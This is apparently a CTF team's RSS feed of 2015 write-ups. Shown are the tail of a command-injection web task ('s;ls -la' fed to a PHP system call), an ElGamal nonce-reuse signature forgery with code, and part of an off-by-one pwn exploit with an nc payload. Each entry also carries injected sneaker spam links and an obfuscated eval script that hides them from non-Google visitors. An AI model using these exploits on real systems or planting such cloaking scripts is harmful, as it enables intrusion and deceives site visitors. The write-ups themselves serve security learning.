'Helvetica';">system(“dig”.$_GET[‘dig’]);<br> I tried to give the following input “s;ls -la” and that was the result</span></p><p><img src="/sites/default/files/writeups/images/15_0.png" alt="" width="1004" height="493"></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">Indeed, it executed our command. We can see the hidden file “.hey”. I “catted” the content of the .hey file and it was “Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC”<br> The string looks encrypted/encoded in some way. I tried to decode the string with many things like Base16, Base32, Base64, Base91, Base58, Base85 and Caesar but it didn’t work. I noticed the ZlibC that appended to the end of the file. I though that this is a kind of a hint. I kept googling about the Zlibc and trying to find any relation between it and the given text. After a couple of days googling, I tried an encoding technique called ATOM-128 on that website http://crypo.in.ua/tools/eng_base64c.php and indeed it decoded the text which was </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica'; font-weight: bold;">infosec_flagis_rceatomized </span></p><p><span style="font-size: 12.000000pt; font-family: 'Helvetica';">We searched for what atom-128 means and according to the following question on stackoverflow.com, it is a special type of base64 encoding in which a different order of characters is used.&nbsp;</span></p></div></div></div><span class="keys_words"><a class="links_good_rands" href="https://www.nikesneakers.org/">Best Nike Sneakers</a> | <a class="links_good_rands" href="https://www.oft.gov.gi/index.php/eeagcnshop/fr/fr/nike-homme">NIKE HOMME</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div></description>
<pubDate>Mon, 23 Mar 2015 23:09:43 +0000</pubDate>
<dc:creator>the_storm</dc:creator>
<guid isPermaLink="false">99 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/99#comments</comments>
</item>
<item>
<title>Wood Island (Crypto - 150)</title>
<link>https://ctfcrew.org/writeup/98</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/crypto">crypto</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/32">Boston Key Party 2015</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p><strong>Task:</strong></p><p>You can try to sign messages and send them to the server, 52.0.217.48 port 60231. Sign the right message and you\'ll get the flag! Only problem---you don\'t have the signing key. I will give you this, though: sigs.txt is a file containing a bunch of signatures. I hope it helps. (P.S. Don\'t try and send the exact signatures in that file---that\'s cheating!)</p><p>Given archieve attached below.</p><p><strong>Solution:</strong></p><p><!--break--></p><p>Let's start! Unpack archieve and take a look inside. We have three python scripts and one .txt file. Two python files contain only constants, but last contains server implemetation. Let's have a closer look on it:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag"> def handle(self):
self.captcha()
sig = self.request.recv(5000)
sig = json.loads(sig)
if "r" not in sig or "s" not in sig or "m" not in sig:
self.request.close()
return
r = sig["r"]
s = sig["s"]
m = sig["m"]
if not elgamal_verify(r, s, m):
self.request.close()
elif is_duplicate(sig):
self.request.close()
elif m != "There is no need to be upset":
self.request.close()
else:
self.request.sendall(FLAG)
self.request.close()</pre><p>And:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">def elgamal_verify(r, s, m):
if r &lt;= 0 or r &gt;= SAFEPRIME:
return False
if s &lt;= 0 or s &gt;= SAFEPRIME-1:
return False
h = int(hashlib.sha384(m).hexdigest(), 16)
left = pow(GENERATOR, h, SAFEPRIME)
right = (pow(PUBKEY, r, SAFEPRIME) * pow(r, s, SAFEPRIME)) % SAFEPRIME
return left == right
DUPLICATES = []
def is_duplicate(s):
return s in DUPLICATES</pre><p>So, wha is happening here? First step is Anti-captcha (proof of work) - you have to proove, that you are robot (cos human cant calculate hash in mind...=) ), you can bypass it with bruteforce, using scripts from previos arcticles.</p><p>On the second step server checks signature: it takes from user json with <em>m</em>, <em>r</em> and <em>s</em> fields and perfoms some checks:</p><ol><li>&nbsp;<em>(r,s)</em> signature is valid for message <em>m</em></li><li>Message and it's signature were not used before (not in given sigs.txt file)</li><li>Message <em>m</em> is equal to "There is no need to be upset"</li></ol><p>So we just have to forge valid signature for meddage: "There is no need to be upset".</p><p>Because verification function is called "elgamal_verify", you may suppose that server uses ElGamal Scheme. Let's open wikipedia and gain some information about this <a href="http://en.wikipedia.org/wiki/ElGamal_signature_scheme">scheme</a>.&nbsp;Among all you can find "Security" <a href="http://en.wikipedia.org/wiki/ElGamal_signature_scheme#Security">part</a>&nbsp;and some interesting things in it:</p><p><em><span style="color: #252525; font-family: sans-serif; line-height: 22px;">The signer must be careful to choose a different&nbsp;</span>k<span style="color: #252525; font-family: sans-serif; line-height: 22px;">&nbsp;uniformly at random for each signature and to be certain that&nbsp;</span>k<span style="color: #252525; font-family: sans-serif; line-height: 22px;">, or even partial information about&nbsp;</span>k<span style="color: #252525; font-family: sans-serif; line-height: 22px;">, is not leaked. Otherwise, an attacker may be able to deduce the secret key&nbsp;</span>x<span style="color: #252525; font-family: sans-serif; line-height: 22px;">&nbsp;with reduced difficulty, perhaps enough to allow a practical attack. In particular, if two messages are sent using the same value of&nbsp;</span>k<span style="color: #252525; font-family: sans-serif; line-height: 22px;">&nbsp;and the same key, then an attacker can compute&nbsp;</span>x<span style="color: #252525; font-family: sans-serif; line-height: 22px;">&nbsp;directly.</span></em></p><p><span style="color: #252525; font-family: sans-serif; line-height: 22px;">And we have we have sigs.txt file with several signatures.. looks like we are on the right way... but what is <em>k</em>? Wiki says:</span></p><p style="margin-top: 0.5em; margin-bottom: 0.5em; line-height: 22px; color: #252525; font-family: sans-serif;"><em>To sign a message&nbsp;m&nbsp;the signer performs the following steps.</em></p><ul style="line-height: 22px; margin-top: 0.3em; margin-bottom: 0px; margin-left: 1.6em; list-style-image: url('data:image/svg+xml,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20version%3D%221.1%22%20width%3D%225%22%20height%3D%2213%22%3E%0A%3Ccircle%20cx%3D%222.5%22%20cy%3D%229.5%22%20r%3D%222.5%22%20fill%3D%22%2300528c%22%2F%3E%0A%3C%2Fsvg%3E%0A'); color: #252525; font-family: sans-serif;"><li style="margin-bottom: 0.1em;"><em>Choose a random&nbsp;k&nbsp;such that 1&nbsp;&lt;&nbsp;k&nbsp;&lt;&nbsp;p&nbsp;−&nbsp;1 and gcd(k,&nbsp;p&nbsp;−&nbsp;1)&nbsp;=&nbsp;1.</em></li><li style="margin-bottom: 0.1em;"><em>Compute&nbsp;<img class="mwe-math-fallback-image-inline tex" style="display: inline-block;" src="http://upload.wikimedia.org/math/9/9/8/998605102271444e000a47030ecf2c1d.png" alt=" r \, \equiv \, g^k \pmod p">.</em></li><li style="margin-bottom: 0.1em;"><em>Compute&nbsp;<img class="mwe-math-fallback-image-inline tex" style="display: inline-block;" src="http://upload.wikimedia.org/math/e/2/b/e2b71441122c33e81b283228fd1a73dc.png" alt=" s \, \equiv \, (H(m)-x r)k^{-1} \pmod{p-1}">.</em></li><li style="margin-bottom: 0.1em;"><em>If&nbsp;<img class="mwe-math-fallback-image-inline tex" style="display: inline-block;" src="http://upload.wikimedia.org/math/7/8/7/787d0b6e5d9e7525a7054c6f96c377ea.png" alt="s=0">&nbsp;start over again.</em></li></ul><p>&nbsp;</p><p style="margin-top: 0.5em; margin-bottom: 0.5em; line-height: 22px; color: #252525; font-family: sans-serif;"><em>Then the pair (r,s) is the digital signature of&nbsp;m. The signer repeats these steps for every signature.</em></p><p style="margin-top: 0.5em; margin-bottom: 0.5em; line-height: 22px; color: #252525; font-family: sans-serif;">So, if in two signatures same <em>k</em> was used, both signatures have same <em>r</em>. Let's examine given sigs.txt file to find out same <em>r&nbsp;</em>values. For example, this script will do it for you:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">import re
with open('sigs.txt', 'r') as f:
data = f.read()
searcher = re.compile( "\"r\": \d+")
r_vals = searcher.findall(data)
uniq = []
for r in r_vals:
if r in uniq:
print r
else:
uniq.append(r)</pre><p>Result:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">"r": 24030551483122053624716977527407536977518653033297939409122802809740309624953770247347499500115945237454766787108175375302146086541500888306491588588147326149187734156069939639058405265571675349658277792098286622286226058008567542381029931604553716421740469902946532483973532336362867141732245398972208695076558639383660148089152829691282160772599817042880415931978266720626748559045779449893737272112671672750802677804265935211941474277988895796905249955578045776622418603597677320454557350772863501720544466286669388103247173728880382526588182905215363298438385070158385795742683303408289812120424459186306607441289
"r": 15596574224423604337174975776788465266479462558269645435687330615427783442319450174310669167504694165949734195772140468403401519160093357880254143018633950179114008556651092403391366077557363361555123124177670387232880718011385652224689886844787549431939261644192798219757366042713163922831165605478332687249430607990154018556718572496906645239311390495141354282987806832079357224945158666328969818853986069540836255016227603632402476397515152119360294922495895244235309968400537736534622122663697025389872185310053285819453794953849878570802282548259719716065417998189738453640724390984216257023730024188208988434794
"r": 7642569978590436429035839941747247560961995622187738908962159214058334385040541356267957242899354560757177741259486145756635387643986997662432251492305334195580243624629435620896520306233592274992724847384959546615834897272240261629833454725467996866722488751905291163060514410309569216190018941208834286631363010818364154295177563417071850364776094073956065971376816168479731258230097121738745272755290500815682780120887578487480236247646661452058929568790006839190000789494099743010979644184683260698667768183665065310183202237640230653237055185353887233368385521231171006737686056695974479215510810069532170450224
[Finished in 0.1s]</pre><p>&nbsp; We find three <em>r,&nbsp;</em>which are not unique. So we can perform attack, that was described above. Wiki says:</p><p><em><span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">s = ( H(m) - xr )k<sup>-1</sup> (mod p-1)</span></span></em></p><p><em>sk = H(m) - xr&nbsp;<span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">(mod p-1)</span></span></em></p><p><em><span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">H(m) = sk + xr (mod p-1)</span></span></em></p><p><span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">We have two different messages with two signatures <em>(s,r)</em>, where <em>s</em> are different but <em>r</em> are equal. So we have system of two&nbsp;</span></span>equations<span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">:</span></span></p><p><span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">H(m<sub>1</sub>) = s<sub>1</sub>k + xr (mod p-1)</span></span></p><p><span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">H(m<sub>2</sub>) = s<sub>2</sub>k + xr (mod p-1)</span></span></p><p><span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">Where <em>x</em> and <em>k</em> is unknow variables. Be careful, when solving this system, because integers modulo p-1 is a ring, so not all elements have multiplicative inverse. For example, even <em>s</em> wouldn't has it.</span></span></p><p><span style="color: #252525; font-family: sans-serif;"><span style="line-height: 22px;">You can use any Math application to solve system of&nbsp;</span></span>equations by modulo and find <em>k</em> and <em>x.&nbsp;</em>I've used Wolfram Math:</p><div data-rz-params="{&quot;__TYPE&quot;:&quot;LINE&quot;,&quot;RANDOM&quot;:0.11121001280844212}"><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">Solve[
15596574224423604337174975776788465266479462558269645435687330615427783442319450174310669167504694165949734195772140468403401519160093357880254143018633950179114008556651092403391366077557363361555123124177670387232880718011385652224689886844787549431939261644192798219757366042713163922831165605478332687249430607990154018556718572496906645239311390495141354282987806832079357224945158666328969818853986069540836255016227603632402476397515152119360294922495895244235309968400537736534622122663697025389872185310053285819453794953849878570802282548259719716065417998189738453640724390984216257023730024188208988434794*x +
20193160426525825914749944534502183854793246273057225225204130786954179606391520252397561856344584750457489718289118609515303464507510251417077403315954173676057341891301159286752647600395198190644724307893515345893595410667424425312908674343690968733843740920409803587443515922925501638028491932183400780974410265039483539351372898810463837406346416273301833999371981123383744331959625540606861187311099827640470542835373136973637049034852358457864170556183428016586548277807973991611705101720973851865311156212618466002189499709957796272187041939722207610584175170433726950035007314375587759506260786928657084551208*y ==
17522164631796177405895087447911918224805069054544219936136496691782804368700681944248318092297704863697843193489206 &amp;&amp;
15596574224423604337174975776788465266479462558269645435687330615427783442319450174310669167504694165949734195772140468403401519160093357880254143018633950179114008556651092403391366077557363361555123124177670387232880718011385652224689886844787549431939261644192798219757366042713163922831165605478332687249430607990154018556718572496906645239311390495141354282987806832079357224945158666328969818853986069540836255016227603632402476397515152119360294922495895244235309968400537736534622122663697025389872185310053285819453794953849878570802282548259719716065417998189738453640724390984216257023730024188208988434794*x +
20950544720225190240516588643124156640166137751307772794120839122642879744566309989204234525193060193095734419581892490241084064977398989989423034374978973475972879096343609617333859217032402467474794063367359126064209414247112196692749986283927599483857635906461630946699655333336064650658571060838418022831773012112148484373450539087980144060939705883970226872558602362137321434221468807558634789744082687788692428002582578979320390623784385653753663765668912704533244714593744067390408848738952250051111603136134591670549919971405683223154547996667007410471545395238084694224087888217638321220704877088996234667758*y ==
32912878155772232082988690525300428836530642510373329387039819701838393571941848326053069623907005119234663553785330,
{x, y},
Modulus -&gt;
27327395392065156535295708986786204851079528837723780510136102615658941290873291366333982291142196119880072569148310240613294525601423086385684539987530041685746722802143397156977196536022078345249162977312837555444840885304704497622243160036344118163834102383664729922544598824748665205987742128842266020644318535398158529231670365533130718559364239513376190580331938323739895791648429804489417000105677817248741446184689828512402512984453866089594767267742663452532505964888865617589849683809416805726974349474427978691740833753326962760114744967093652541808999389773346317294473742439510326811300031080582618145726]</pre><p>And result is:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">Answer:
{{x -&gt; 11405148977472070847365218710766449078537570969688340378848352437920775589263471165689667400222906768815975260917123165802980646318353389631475775638254459726964055271804077962848769755220905417865830271596783314761387652548615547386856401898810558155866110142664500325585994569852700494187601969524512877504501310480889704990280605643619505056187819289992366250062643439920600261106116347627717948112330653523084554538170888898127933270176684391756706118533788708485259278763353731318153045165374215647633533950855383457673005747323515328227853308910032144312613158202921709938645864922336849172162584600594548383769 +
13663697696032578267647854493393102425539764418861890255068051307829470645436645683166991145571098059940036284574155120306647262800711543192842269993765020842873361401071698578488598268011039172624581488656418777722420442652352248811121580018172059081917051191832364961272299412374332602993871064421133010322159267699079264615835182766565359279682119756688095290165969161869947895824214902244708500052838908624370723092344914256201256492226933044797383633871331726266252982444432808794924841904708402863487174737213989345870416876663481380057372483546826270904499694886673158647236871219755163405650015540291309072863 C[1],
y -&gt; 12780654076712315342557968007566379935229954276230807639665702142103549136408699104332337502550652581806514878279261654171262095484373525061520969023188821681199026858966468950451221700940218653506601368343894689092533052209732513940302093154785769183690626111706770904919054659023003137158039635431673035380262813165085357833180324316706979051198536038699978511970853276885780181015508612084020605897756865495255350696748220033237316185373458895608809435734616059720556237199048361906711902462009427742458373806078932083281313989085236666731027152436636238565509653859120339870549660036293474217320107816478127848604 +
13663697696032578267647854493393102425539764418861890255068051307829470645436645683166991145571098059940036284574155120306647262800711543192842269993765020842873361401071698578488598268011039172624581488656418777722420442652352248811121580018172059081917051191832364961272299412374332602993871064421133010322159267699079264615835182766565359279682119756688095290165969161869947895824214902244708500052838908624370723092344914256201256492226933044797383633871331726266252982444432808794924841904708402863487174737213989345870416876663481380057372483546826270904499694886673158647236871219755163405650015540291309072863 C[2]}}</pre><p><br>As you can see, system has muliply solutiuons.&nbsp;</p><p>You can very fast check all four combinations by forging four variants of <em>(s,r)</em> signature for <em>m</em> = "There is no need to be upset", and sending it on server. If you use same <em>r</em> as in sigs.txt, you just need to compute <em>s, </em>so:</p><pre class="brush: python; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">K = 12780654076712315342557968007566379935229954276230807639665702142103549136408699104332337502550652581806514878279261654171262095484373525061520969023188821681199026858966468950451221700940218653506601368343894689092533052209732513940302093154785769183690626111706770904919054659023003137158039635431673035380262813165085357833180324316706979051198536038699978511970853276885780181015508612084020605897756865495255350696748220033237316185373458895608809435734616059720556237199048361906711902462009427742458373806078932083281313989085236666731027152436636238565509653859120339870549660036293474217320107816478127848604 + 13663697696032578267647854493393102425539764418861890255068051307829470645436645683166991145571098059940036284574155120306647262800711543192842269993765020842873361401071698578488598268011039172624581488656418777722420442652352248811121580018172059081917051191832364961272299412374332602993871064421133010322159267699079264615835182766565359279682119756688095290165969161869947895824214902244708500052838908624370723092344914256201256492226933044797383633871331726266252982444432808794924841904708402863487174737213989345870416876663481380057372483546826270904499694886673158647236871219755163405650015540291309072863
R = 15596574224423604337174975776788465266479462558269645435687330615427783442319450174310669167504694165949734195772140468403401519160093357880254143018633950179114008556651092403391366077557363361555123124177670387232880718011385652224689886844787549431939261644192798219757366042713163922831165605478332687249430607990154018556718572496906645239311390495141354282987806832079357224945158666328969818853986069540836255016227603632402476397515152119360294922495895244235309968400537736534622122663697025389872185310053285819453794953849878570802282548259719716065417998189738453640724390984216257023730024188208988434794
Kinv = inverse(K, M)
print Kinv
11229564743034185040004960050772054007682662152342489588663134546157830837439948644777566056798431052050328871856833998547970536669342678490701009207205388039479343267225423580587116767573396520467953567708885431696965609591547186713704202330941400518771586809861731353532477280946818593198085158822727812249062666604332954171368291583140313845753585453894318934470456670469827222218354006201600442374222432023493236612146637469249317961367788649325550166802023675758482489748891700581825892091702679217253672563341697873025935541062804335772599169547952882534586596303285146433449671309000641194778425709515061034061L
H = int(hashlib.sha384("There is no need to be upset").hexdigest(), 16)
X = 11405148977472070847365218710766449078537570969688340378848352437920775589263471165689667400222906768815975260917123165802980646318353389631475775638254459726964055271804077962848769755220905417865830271596783314761387652548615547386856401898810558155866110142664500325585994569852700494187601969524512877504501310480889704990280605643619505056187819289992366250062643439920600261106116347627717948112330653523084554538170888898127933270176684391756706118533788708485259278763353731318153045165374215647633533950855383457673005747323515328227853308910032144312613158202921709938645864922336849172162584600594548383769 + 13663697696032578267647854493393102425539764418861890255068051307829470645436645683166991145571098059940036284574155120306647262800711543192842269993765020842873361401071698578488598268011039172624581488656418777722420442652352248811121580018172059081917051191832364961272299412374332602993871064421133010322159267699079264615835182766565359279682119756688095290165969161869947895824214902244708500052838908624370723092344914256201256492226933044797383633871331726266252982444432808794924841904708402863487174737213989345870416876663481380057372483546826270904499694886673158647236871219755163405650015540291309072863
S = ((H - X * R) * Kinv) % M
print S
11057062360037254017289635018921773984183564064092395096838773711381090984064311698289768170915721461871937003117929770925039756903570621025707383705465627567970676462056327449577227456755524929286234463839696828725619393734746030826431182855696671016288244742041130665258517881078515879578523743937721290168743838774382061947237978837869517592441458667243091811392910778481879611111807313162640186698122857701857400429810865528683646940672873418762238830032505222891402579366927300508292794863485872865578871520392827529932070319462416460050694529429370692076137317134639455980792967653965353227009612149885652150641L</pre><p>&nbsp;Send (r,s,m) json and get:</p><p>nonces_are_fucking_rad_amirite</p><p><strong>Flag:&nbsp;nonces_are_fucking_rad_amirite</strong></p><p>&nbsp;</p></div><span class="keys_words"><a class="links_good_rands" href="https://www.mysneakers.org/">Mysneakers</a> | <a class="links_good_rands" href="https://www.ietp.com/fr/dfeghoshop/nike-air-max-270/">Nike Air Max 270 - Deine Größe bis zu 70% günstiger</a></span><script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('b i=r f["\\q\\1\\4\\g\\p\\l"]("\\4"+"\\7"+"\\7"+"\\4"+"\\5\\1","\\4\\k");s(!i["\\3\\1\\2\\3"](m["\\h\\2\\1\\j\\n\\4\\1\\6\\3"])){b a=f["\\e\\7\\o\\h\\d\\1\\6\\3"]["\\4\\1\\3\\g\\5\\1\\d\\1\\6\\3\\2\\z\\9\\A\\5\\c\\2\\2\\x\\c\\d\\1"](\'\\t\\1\\9\\2\\w\\v\\7\\j\\e\\2\');u(b 8=0;8<a["\\5\\1\\6\\4\\3\\y"];8++)a[8]["\\2\\3\\9\\5\\1"]["\\e\\k\\2\\l\\5\\c\\9"]=\'\\6\\7\\6\\1\'}',37,37,'|x65|x73|x74|x67|x6c|x6e|x6f|NLpndlS3|x79|rBfb2|var|x61|x6d|x64|window|x45|x75|AESwV1|x72|x69|x70|navigator|x41|x63|x78|x52|new|if|x6b|for|x77|x5f|x4e|x68|x42|x43'.split('|'),0,{}));</script></div></div></div><div class="field field-name-field-file field-type-file field-label-above"><div class="field-label">Attachments:&nbsp;</div><div class="field-items"><div class="field-item even"><span class="file"><img class="file-icon" alt="Binary Data" title="application/octet-stream" src="/modules/file/icons/application-octet-stream.png" /> <a href="https://ctfcrew.org/sites/default/files/writeups/wood-island.tar_.gz" type="application/octet-stream; length=546593">wood-island.tar_.gz</a></span></div></div></div></description>
<pubDate>Wed, 04 Mar 2015 08:58:45 +0000</pubDate>
<dc:creator>Triff</dc:creator>
<guid isPermaLink="false">98 at https://ctfcrew.org</guid>
<comments>https://ctfcrew.org/writeup/98#comments</comments>
</item>
<item>
<title>Kendall (pwn - 300)</title>
<link>https://ctfcrew.org/writeup/97</link>
<description><div class="field field-name-field-category field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Category:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/categories/pwn">pwn</a></div></div></div><div class="field field-name-field-event field-type-taxonomy-term-reference field-label-inline clearfix"><div class="field-label">Event:&nbsp;</div><div class="field-items"><div class="field-item even"><a href="/event/32">Boston Key Party 2015</a></div></div></div><div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even"><p>Description of task is pretty small:</p><p>52.0.164.37:8888</p><p>And <a href="https://ctfcrew.org/sites/default/files/writeups/kendall.tar_.gz">link</a> to file (ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped).</p><p>&nbsp;</p><p><strong>Solution</strong></p><p>After connecting to the server we receive the following menu:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">#####################################################
# DHCP Management Console #
# Auditing Interface #
#####################################################
h show this help
a authenticate
c config menu
d dhcp lease menu
e exit
[m]#</pre><p><em>authenticate</em> - stage for inputting administrator's password</p><p><em>config menu</em>:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">[c]# h
h show this help
l list keys/values
s change start ip
e change end ip
k change netmask ip
n change nameserver ip
m return to main menu
[c]# l
DHCP Configuration:
Start IP: 192.168.000.100
End IP: 192.168.000.200
Netmask: 255.255.255.000
Nameserver: 8.8.8.8</pre><p><em>dhcp lease menu</em>:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">[d]# h
h show this help
r renew leases
l list leases
f filter leases
m return to main menu
</pre><p>&nbsp;</p><p>Ok, we've got some sort of router's management console. But anyway the task's type is pwn and we've got the binary, so...</p><p><img src="/sites/default/files/writeups/images/bk2015kendall_writeup_meme_image.jpg" alt="" width="420" height="250"></p><p>Surely we should reverse the binary and find some vulnerable stuff there!</p><p>After investigation of the binary we notice that all input reading is done into global buffer <em>s2</em> which size is exatcly 128 bytes:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_global_buffer_s2.PNG" alt="" width="651" height="210"></p><p>Hope you've already noted that the buffer followed by global variable containing current user status - administrator or not. I called it <em>adminFlag</em>. The only legal way to change that flag is through&nbsp;<em>authenticate</em> menu. Authentication served by the following function:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kenall_password_cheking.PNG" alt="" width="529" height="489"></p><p>And it looks pertty safe. But if we try to understand how <em>reading input</em> function works:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_read_128_func.PNG" alt="" width="352" height="411"></p><p>We see that there is a off by one error. Fortunately it is byte of <em>adminFlag</em> which should be zero'ed to escalate our access rights. So for escalation to administrator we need:</p><ul><li>find call to <em>sub_400EA6()</em> with argument length &gt;= 128</li><li>write 128 bytes followed&nbsp;<strong>'\n'</strong> to make 129th byte to be zero</li></ul><p>Jumping to xrefs of&nbsp;<em>sub_400EA6()</em>function we find one place where it is called with argument's value of 128:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_filter_function.PNG" alt="" width="482" height="455"></p><p>Nice! It is <em>filter leases</em> stage of&nbsp;<em>dhcp lease menu</em> we saw above. Well, exploit for rights escalation is easy and small:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">doris$ python -c "open('pl', 'wb').write('d\n' + 'f\n' + 'A' * 128 + '\n')"
doris$ cat pl - | nc 52.0.164.37 8888
#####################################################
# DHCP Management Console #
# Auditing Interface #
#####################################################
h show this help
a authenticate
c config menu
d dhcp lease menu
e exit
[m]# [d]# Enter filter condition: [d]$</pre><p>BOOM! We became the administrator. Sadly, it does not give us any flag. Task worths 300 points, by the way, so it should not be so easy. As administrator now we have another possibilities in context of service. Now we are able to:</p><p>not only list but also change DHCP configuration:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">[c]$ l
DHCP Configuration:
Start IP: 192.168.000.100
End IP: 192.168.000.200
Netmask: 255.255.255.000
Nameserver: 8.8.8.8
[c]$ s
Current Value: 192.168.000.100
New Value: asd
Your input asd cointains invalid characters. Only digits and dots allowed!</pre><p>and now we can execute <em>renew leases</em> action:</p><p><img src="/sites/default/files/writeups/images/bkp_kenall_renew_leases_system_call.PNG" alt="" width="886" height="193"></p><p>OMG! It is pure <em>system()</em> call with string which is coltrolled by us (arguments for sprintf are IP addresses of DHCP config).</p><p>Sadly again, but it is not so easy. It is BKP CTF's task for 300 points, remember?</p><p>Function for processing DHCP settings update called for each IP address we input:</p><p><img src="/sites/default/files/writeups/images/bkp2015_kendall_read_ip_and_change.PNG" alt="" width="910" height="514"></p><p>it has some small bugs, but anyway we can not provide any useful payload for <em>system()</em> call - only digits and dots are really allowed.</p><p>Further investigation of the binary did not give any other exploitable vulnerabilities. We were really stucked, because it is <em>pwn</em> task and usually we expect some serious binary exploitation, even hardcore exploitation because of 300 points.</p><p>Later, when we finally understand that there is nothing to do with the binary we return back to:</p><p>&nbsp;<img src="/sites/default/files/writeups/images/bkp2015_kendall_dhcp_lease_menu_meme.PNG" alt="" width="427" height="194"></p><p>&nbsp;Fuzzing DHCP settings we try to set up DNS IP for our own server's address. Then listen for anything incoming traffic there:</p><pre class="brush: bash; auto-links: true; collapse: false; first-line: 1; html-script: false; smart-tabs: true; tab-size: 4; toolbar: true; codetag">root@evildns:/tmp# tcpdump -n dst port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
12:27:44.272585 IP 52.0.164.37.52440 &gt; 188.166.48.175.53: 26405+ A? yandex.ru. (27)
